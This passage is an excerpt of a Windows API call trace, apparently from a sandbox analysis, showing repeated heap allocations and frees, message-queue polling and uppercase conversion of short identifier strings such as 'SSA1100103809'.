hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.523] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0088.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0088.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.523] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0088.523] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0088.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0088.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0088.523] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.523] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0088.523] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0088.524] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0088.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0088.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0088.524] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0088.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0088.524] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0088.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0088.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0088.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0088.524] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0088.527] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0088.528] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0088.528] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.528] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f68 [0088.528] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0088.528] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0088.528] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0088.529] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.529] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f68 | out: hHeap=0x2af0000) returned 1 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.529] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.529] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0088.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0088.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0088.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0088.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0088.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0088.530] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0088.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.530] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0088.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0088.531] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0088.531] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0088.531] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0088.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0088.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0088.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.532] RtlAllocateHeap 